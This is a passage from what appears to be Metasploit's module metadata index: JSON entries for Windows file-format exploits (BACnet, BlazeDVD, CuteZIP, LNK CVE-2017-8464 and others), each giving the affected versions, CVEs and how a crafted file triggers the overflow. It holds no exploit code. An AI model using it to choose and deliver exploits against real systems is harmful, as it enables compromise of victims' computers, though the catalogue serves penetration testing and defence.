"is_install_path": true,
"ref_name": "windows/fileformat/aviosoft_plf_buf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/bacnet_csv": {
"name": "BACnet OPC Client Buffer Overflow",
"full_name": "exploit/windows/fileformat/bacnet_csv",
"rank": 400,
"disclosure_date": "2010-09-16",
"type": "exploit",
"author": [
"Jeremy Brown",
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in SCADA\n Engine BACnet OPC Client v1.0.24. When the BACnet OPC Client\n parses a specially crafted csv file, arbitrary code may be\n executed.",
"references": [
"CVE-2010-4740",
"OSVDB-68096",
"BID-43289",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-10-264-01.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 English",
"Windows 2000 SP4 English"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/windows/fileformat/bacnet_csv.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/bacnet_csv",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/beetel_netconfig_ini_bof": {
"name": "Beetel Connection Manager NetConfig.ini Buffer Overflow",
"full_name": "exploit/windows/fileformat/beetel_netconfig_ini_bof",
"rank": 300,
"disclosure_date": "2013-10-12",
"type": "exploit",
"author": [
"metacom",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow on Beetel Connection Manager. The\n vulnerability exists in the parsing of the UserName parameter in the NetConfig.ini\n file. The module has been tested successfully on PCW_BTLINDV1.0.0B04 over Windows XP\n SP3 and Windows 7 SP1.",
"references": [
"OSVDB-98714",
"EDB-28969"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"PCW_BTLINDV1.0.0B04 (WinXP SP3, Win7 SP1)"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/beetel_netconfig_ini_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/blazedvd_hdtv_bof": {
"name": "BlazeVideo HDTV Player Pro v6.6 Filename Handling Vulnerability",
"full_name": "exploit/windows/fileformat/blazedvd_hdtv_bof",
"rank": 300,
"disclosure_date": "2012-04-03",
"type": "exploit",
"author": [
"b33f",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in BlazeVideo HDTV Player's filename\n handling routine. When supplying a string of input data embedded in a .plf file,\n the MediaPlayerCtrl.dll component will try to extract a filename by using\n PathFindFileNameA(), and then copies whatever the return value is on the stack by\n using an inline strcpy. As a result, if this input data is long enough, it can cause\n a stack-based buffer overflow, which may lead to arbitrary code execution under the\n context of the user.",
"references": [
"OSVDB-80896",
"EDB-18693",
"EDB-22931"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"BlazeVideo HDTV Player Pro v6.6.0.3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/blazedvd_hdtv_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/blazedvd_plf": {
"name": "BlazeDVD 6.1 PLF Buffer Overflow",
"full_name": "exploit/windows/fileformat/blazedvd_plf",
"rank": 400,
"disclosure_date": "2009-08-03",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"Deepak Rathore",
"Spencer McIntyre",
"Ken Smith"
],
"description": "This module exploits a stack overflow in BlazeDVD 5.1 and 6.2. When\n the application is used to open a specially crafted plf file,\n a buffer is overwritten allowing for the execution of arbitrary code.",
"references": [
"CVE-2006-6199",
"EDB-32737",
"OSVDB-30770",
"BID-35918"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"BlazeDVD 6.2",
"BlazeDVD 5.1"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/windows/fileformat/blazedvd_plf.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/blazedvd_plf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-service-down"
],
"SideEffects": [
"screen-effects"
]
}
},
"exploit_windows/fileformat/boxoft_wav_to_mp3": {
"name": "Boxoft WAV to MP3 Converter v1.1 Buffer Overflow",
"full_name": "exploit/windows/fileformat/boxoft_wav_to_mp3",
"rank": 300,
"disclosure_date": "2015-08-31",
"type": "exploit",
"author": [
"Robbie Corley",
"Shelby Pace"
],
"description": "This module exploits a stack buffer overflow in Boxoft WAV to MP3 Converter versions 1.0 and 1.1.\n By constructing a specially crafted WAV file and attempting to convert it to an MP3 file in the\n application, a buffer is overwritten, which allows for running shellcode.",
"references": [
"CVE-2015-7243",
"EDB-38035"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Boxoft WAV to MP3 Converter v1.1"
],
"mod_time": "2018-07-02 14:00:33 +0000",
"path": "/modules/exploits/windows/fileformat/boxoft_wav_to_mp3.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/boxoft_wav_to_mp3",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/bpftp_client_bps_bof": {
"name": "BulletProof FTP Client BPS Buffer Overflow",
"full_name": "exploit/windows/fileformat/bpftp_client_bps_bof",
"rank": 300,
"disclosure_date": "2014-07-24",
"type": "exploit",
"author": [
"Gabor Seljan"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in\n BulletProof FTP Client 2010, caused by an overly long hostname.\n\n By persuading the victim to open a specially-crafted .BPS file, a\n remote attacker could execute arbitrary code on the system or cause\n the application to crash. This module has been tested successfully on\n Windows XP SP3.",
"references": [
"EDB-34162",
"EDB-34540",
"EDB-35449",
"OSVDB-109547",
"CVE-2014-2973"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/bpftp_client_bps_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/bsplayer_m3u": {
"name": "BS.Player 2.57 Buffer Overflow (Unicode SEH)",
"full_name": "exploit/windows/fileformat/bsplayer_m3u",
"rank": 300,
"disclosure_date": "2010-01-07",
"type": "exploit",
"author": [
"C4SS!0 G0M3S",
"Chris Gabriel"
],
"description": "This module exploits a buffer overflow in BS.Player 2.57. When\n the playlist import is used to import a specially crafted m3u file,\n a buffer overflow occurs allowing arbitrary code execution.",
"references": [
"OSVDB-82528",
"EDB-15934"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP",
"Windows 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/bsplayer_m3u.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/bsplayer_m3u",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ca_cab": {
"name": "CA Antivirus Engine CAB Buffer Overflow",
"full_name": "exploit/windows/fileformat/ca_cab",
"rank": 400,
"disclosure_date": "2007-06-05",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in CA eTrust Antivirus 8.1.637.\n By creating a specially crafted CAB file, an attacker may be able\n to execute arbitrary code.",
"references": [
"CVE-2007-2864",
"OSVDB-35245",
"BID-24330",
"ZDI-07-035"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 All / Windows XP SP0/SP1 (CA eTrust Antivirus 8.1.637)"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/ca_cab.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ca_cab",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/cain_abel_4918_rdp": {
"name": "Cain and Abel RDP Buffer Overflow",
"full_name": "exploit/windows/fileformat/cain_abel_4918_rdp",
"rank": 400,
"disclosure_date": "2008-11-30",
"type": "exploit",
"author": [
"Trancek <trancek@yashira.org>"
],
"description": "This module exploits a stack-based buffer overflow in the Cain & Abel v4.9.24\n and below. An attacker must send the file to the victim, and the victim must open\n the specially crafted RDP file under Tools -> Remote Desktop Password Decoder.",
"references": [
"CVE-2008-5405",
"OSVDB-50342",
"EDB-7329",
"BID-32543"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2 English",
"Windows XP SP0/1 English",
"Windows XP SP2 Spanish"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/cain_abel_4918_rdp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ccmplayer_m3u_bof": {
"name": "CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow",
"full_name": "exploit/windows/fileformat/ccmplayer_m3u_bof",
"rank": 400,
"disclosure_date": "2011-11-30",
"type": "exploit",
"author": [
"Rh0"
],
"description": "This module exploits a stack based buffer overflow in CCMPlayer 1.5. When opening\n an m3u playlist with a long track name, an SEH exception record can be overwritten\n with parts of the controllable buffer. SEH execution is triggered after an\n invalid read of an injectable address, thus allowing arbitrary code execution.\n This module works on multiple Windows platforms including: Windows XP SP3,\n Windows Vista, and Windows 7.",
"references": [
"CVE-2011-5170",
"OSVDB-77453",
"EDB-18178"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"CCMPlayer 1.5"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ccmplayer_m3u_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/chasys_draw_ies_bmp_bof": {
"name": "Chasys Draw IES Buffer Overflow",
"full_name": "exploit/windows/fileformat/chasys_draw_ies_bmp_bof",
"rank": 300,
"disclosure_date": "2013-07-26",
"type": "exploit",
"author": [
"Christopher Gabriel",
"Longinos Recuero Bustos",
"Javier 'soez'",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow vulnerability found in Chasys Draw IES\n (version 4.10.01). The vulnerability exists in the module flt_BMP.dll, while\n parsing BMP files, where the ReadFile function is used to store user provided data\n on the stack in an insecure way. It results in arbitrary code execution under the\n context of the user viewing a specially crafted BMP file. This module has been\n tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7\n SP1.",
"references": [
"CVE-2013-3928",
"OSVDB-95689",
"BID-61463",
"URL-http://secunia.com/advisories/53773/",
"URL-http://longinox.blogspot.com/2013/08/explot-stack-based-overflow-bypassing.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Chasys Draw IES 4.10.01 / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/chasys_draw_ies_bmp_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/coolpdf_image_stream_bof": {
"name": "Cool PDF Image Stream Buffer Overflow",
"full_name": "exploit/windows/fileformat/coolpdf_image_stream_bof",
"rank": 300,
"disclosure_date": "2013-01-18",
"type": "exploit",
"author": [
"Francis Provencher",
"Chris Gabriel",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Cool PDF Reader prior to version\n 3.0.2.256. The vulnerability is triggered when opening a malformed PDF file that\n contains a specially crafted image stream. This module has been tested successfully\n on Cool PDF 3.0.2.256 over Windows XP SP3 and Windows 7 SP1.",
"references": [
"CVE-2012-4914",
"OSVDB-89349",
"EDB-24463",
"URL-http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=70&Itemid=70"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Cool PDF 3.0.2.256 / Windows 7 SP1 / Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/coolpdf_image_stream_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/corelpdf_fusion_bof": {
"name": "Corel PDF Fusion Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/corelpdf_fusion_bof",
"rank": 300,
"disclosure_date": "2013-07-08",
"type": "exploit",
"author": [
"Kaveh Ghaemmaghami",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in version 1.11 of\n Corel PDF Fusion. The vulnerability exists while handling an XPS file with long entry\n names. In order for the payload to be executed, an attacker must convince the target\n user to open a specially crafted XPS file with Corel PDF Fusion. By doing so, the\n attacker can execute arbitrary code as the target user.",
"references": [
"CVE-2013-3248",
"OSVDB-94933",
"BID-61010",
"URL-http://secunia.com/advisories/52707/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Corel PDF Fusion 1.11 / Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/corelpdf_fusion_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/csound_getnum_bof": {
"name": "Csound hetro File Handling Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/csound_getnum_bof",
"rank": 300,
"disclosure_date": "2012-02-23",
"type": "exploit",
"author": [
"Secunia",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Csound before 5.16.6.\n The overflow occurs when trying to import a malicious hetro file\n from tabular format.\n In order to achieve exploitation the user should import the malicious\n file through csound with a command like \"csound -U het_import msf.csd file.het\".\n This exploit doesn't work if the \"het_import\" command is used directly\n to convert the file.",
"references": [
"CVE-2012-0270",
"OSVDB-79491",
"BID-52144",
"URL-http://secunia.com/secunia_research/2012-3/",
"URL-http://csound.git.sourceforge.net/git/gitweb.cgi?p=csound/csound5.git;a=commit;h=7d617a9551fb6c552ba16874b71266fcd90f3a6f"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Csound 5.15 / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/csound_getnum_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/csound_getnum_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/cutezip_bof": {
"name": "GlobalSCAPE CuteZIP Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/cutezip_bof",
"rank": 300,
"disclosure_date": "2011-02-12",
"type": "exploit",
"author": [
"C4SS!0 G0M3S <Louredo_@hotmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in version 2.1\n of CuteZIP.\n\n In order for the command to be executed, an attacker must convince the target user\n to open a specially crafted zip file with CuteZIP. By doing so, an attacker can\n execute arbitrary code as the target user.",
"references": [
"OSVDB-85709",
"EDB-16162",
"BID-46375"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"CuteZIP 2.1 / Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/cutezip_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/cutezip_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/cve_2017_8464_lnk_rce": {
"name": "LNK Code Execution Vulnerability",
"full_name": "exploit/windows/fileformat/cve_2017_8464_lnk_rce",
"rank": 600,
"disclosure_date": "2017-06-13",
"type": "exploit",
"author": [
"Uncredited",
"Yorick Koster",
"Spencer McIntyre"
],
"description": "This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)\n that contain a dynamic icon, loaded from a malicious DLL.\n\n This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is\n similar except an additional SpecialFolderDataBlock is included. The folder ID set\n in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass\n the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary\n DLL file.\n\n If no PATH is specified, the module will use drive letters D through Z so the files\n may be placed in the root path of a drive such as a shared VM folder or USB drive.",
"references": [
"CVE-2017-8464",
"URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464",
"URL-http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt",
"URL-https://msdn.microsoft.com/en-us/library/dd871305.aspx",
"URL-http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm",
"URL-https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows x64",
"Windows x86"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/cve_2017_8464_lnk_rce",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-service-restarts"
]
}
},
"exploit_windows/fileformat/cyberlink_lpp_bof": {
"name": "CyberLink LabelPrint 2.5 Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/cyberlink_lpp_bof",
"rank": 300,
"disclosure_date": "2017-09-23",
"type": "exploit",
"author": [
"modpr0be <tom@spentera.id>",
"f3ci <marie@spentera.id>"
],
"description": "This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below.\n The vulnerability is triggered when opening a .lpp project file containing an overly long string\n via the open file menu. This results in overwriting a structured exception handler record and taking over the\n application. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit).",
"references": [
"CVE-2017-14627",
"EDB-42777"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"CyberLink LabelPrint <= 2.5 on Windows 7 (64 bit)",
"CyberLink LabelPrint <= 2.5 on Windows 8.1 x64",
"CyberLink LabelPrint <= 2.5 on Windows 10 x64 build 1803"
],
"mod_time": "2018-12-11 07:55:20 +0000",
"path": "/modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/cyberlink_lpp_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/cyberlink_p2g_bof": {
"name": "CyberLink Power2Go name Attribute (p2g) Stack Buffer Overflow Exploit",
"full_name": "exploit/windows/fileformat/cyberlink_p2g_bof",
"rank": 500,
"disclosure_date": "2011-09-12",
"type": "exploit",
"author": [
"modpr0be <modpr0be@spentera.com>",
"mr_me <steventhomasseeley@gmail.com>"
],
"description": "This module exploits a stack buffer overflow in CyberLink Power2Go version 8.x.\n The vulnerability is triggered when opening a malformed p2g file containing an overly\n long string in the 'name' attribute of the file element. This results in overwriting a\n structured exception handler record.",
"references": [
"CVE-2011-5171",
"BID-50997",
"OSVDB-77600",
"EDB-18220",
"US-CERT-VU-158003"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"CyberLink Power2Go 8 (XP/Vista/win7) Universal"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/cyberlink_p2g_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/cytel_studio_cy3": {
"name": "Cytel Studio 9.0 (CY3 File) Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/cytel_studio_cy3",
"rank": 400,
"disclosure_date": "2011-10-02",
"type": "exploit",
"author": [
"Luigi Auriemma",
"James Fitts <fitts.james@gmail.com>"
],
"description": "This module exploits a stack based buffer overflow found\n in Cytel Studio <= 9.0. The overflow is triggered during the\n copying of strings to a stack buffer of 256 bytes.",
"references": [
"OSVDB-75991",
"BID-49924",
"URL-http://aluigi.altervista.org/adv/cytel_1-adv.txt"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Cytel Studio 9.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/cytel_studio_cy3.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/cytel_studio_cy3",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/deepburner_path": {
"name": "AstonSoft DeepBurner (DBR File) Path Buffer Overflow",
"full_name": "exploit/windows/fileformat/deepburner_path",
"rank": 500,
"disclosure_date": "2006-12-19",
"type": "exploit",
"author": [
"Expanders",
"fl0 fl0w",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in versions 1.9.0.228,\n 1.8.0, and possibly other versions of AstonSoft's DeepBurner (Pro, Lite, etc).\n An attacker must send the file to the victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n DBR file within a browser, since the DBR extension is registered to DeepBurner.",
"references": [
"BID-21657",
"OSVDB-32356",
"CVE-2006-6665",
"EDB-2950",
"EDB-8335",
"EDB-11315"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/deepburner_path.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/deepburner_path",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/destinymediaplayer16": {
"name": "Destiny Media Player 1.61 PLS M3U Buffer Overflow",
"full_name": "exploit/windows/fileformat/destinymediaplayer16",
"rank": 400,
"disclosure_date": "2009-01-03",
"type": "exploit",
"author": [
"Trancek <trancek@yashira.org>"
],
"description": "This module exploits a stack-based buffer overflow in the Destiny Media Player 1.61.\n An attacker must send the file to the victim, and the victim must open the file via File-->Open Playlist.",
"references": [
"CVE-2009-3429",
"OSVDB-53249",
"EDB-7651",
"BID-33091"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Destiny Universal",
"Windows XP SP2 Spanish"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/fileformat/destinymediaplayer16.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/destinymediaplayer16",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/digital_music_pad_pls": {
"name": "Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/digital_music_pad_pls",
"rank": 300,
"disclosure_date": "2010-09-17",
"type": "exploit",
"author": [
"Abhishek Lyall <abhilyall@gmail.com>"
],
"description": "This module exploits a buffer overflow in Digital Music Pad Version 8.2.3.3.4.\n When opening a malicious pls file with the Digital Music Pad,\n a remote attacker could overflow a buffer and execute\n arbitrary code.",
"references": [
"OSVDB-68178",
"URL-http://secunia.com/advisories/41519/",
"EDB-15134"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/digital_music_pad_pls.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/digital_music_pad_pls",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/djstudio_pls_bof": {
"name": "DJ Studio Pro 5.1 .pls Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/djstudio_pls_bof",
"rank": 300,
"disclosure_date": "2009-12-30",
"type": "exploit",
"author": [
"Sebastien Duquette",
"Death-Shadow-Dark <death.shadow.dark@gmail.com>"
],
"description": "This module exploits a stack-based buffer overflow in DJ Studio Pro 5.1.6.5.2.\n When handling a .pls file, DJ Studio will copy the user-supplied data on the stack\n without any proper bounds checking done beforehand, therefore allowing code\n execution under the context of the user.",
"references": [
"CVE-2009-4656",
"OSVDB-58159",
"EDB-10827"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"DJ Studio Pro 5.1.6.5.2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/djstudio_pls_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/djstudio_pls_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/djvu_imageurl": {
"name": "DjVu DjVu_ActiveX_MSOffice.dll ActiveX Component Buffer Overflow",
"full_name": "exploit/windows/fileformat/djvu_imageurl",
"rank": 100,
"disclosure_date": "2008-10-30",
"type": "exploit",
"author": [
"dean <dean@zerodaysolutions.com>"
],
"description": "This module exploits a stack buffer overflow in DjVu ActiveX Component. When sending an\n overly long string to the ImageURL() property of DjVu_ActiveX_MSOffice.dll (3.0)\n an attacker may be able to execute arbitrary code. This control is not marked safe\n for scripting, so choose your attack vector accordingly.",
"references": [
"CVE-2008-4922",
"OSVDB-49592",
"BID-31987"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/djvu_imageurl.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/djvu_imageurl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/dupscout_xml": {
"name": "Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow",
"full_name": "exploit/windows/fileformat/dupscout_xml",
"rank": 300,
"disclosure_date": "2017-03-29",
"type": "exploit",
"author": [
"Daniel Teixeira"
],
"description": "This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16\n by using the import command option to import a specially crafted xml file.",
"references": [
"CVE-2017-7310"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2018-02-01 10:05:50 +0000",
"path": "/modules/exploits/windows/fileformat/dupscout_xml.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/dupscout_xml",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/dvdx_plf_bof": {
"name": "DVD X Player 5.5 .plf PlayList Buffer Overflow",
"full_name": "exploit/windows/fileformat/dvdx_plf_bof",
"rank": 300,
"disclosure_date": "2007-06-02",
"type": "exploit",
"author": [
"n00b",
"D3r K0n!G",
"sickness",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and\n Standard. By supplying a long string of data in a plf file (playlist), the\n MediaPlayerCtrl.dll component will attempt to extract a filename out of the string,\n and then copy it on the stack without any proper bounds checking, which causes a\n buffer overflow, and results in arbitrary code execution under the context of the user.\n\n This module has been designed to target common Windows systems such as:\n Windows XP SP2/SP3, Windows Vista, and Windows 7.",
"references": [
"CVE-2007-3068",
"OSVDB-36956",
"BID-24278",
"EDB-17745"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"DVD X Player 5.5 Standard / Pro"
],
"mod_time": "2017-09-22 18:49:09 +0000",
"path": "/modules/exploits/windows/fileformat/dvdx_plf_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/dvdx_plf_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/easycdda_pls_bof": {
"name": "Easy CD-DA Recorder PLS Buffer Overflow",
"full_name": "exploit/windows/fileformat/easycdda_pls_bof",
"rank": 300,
"disclosure_date": "2010-06-07",
"type": "exploit",
"author": [
"chap0",
"Gabor Seljan",
"juan vazquez <juan.vazquez@metasploit.com>"
],
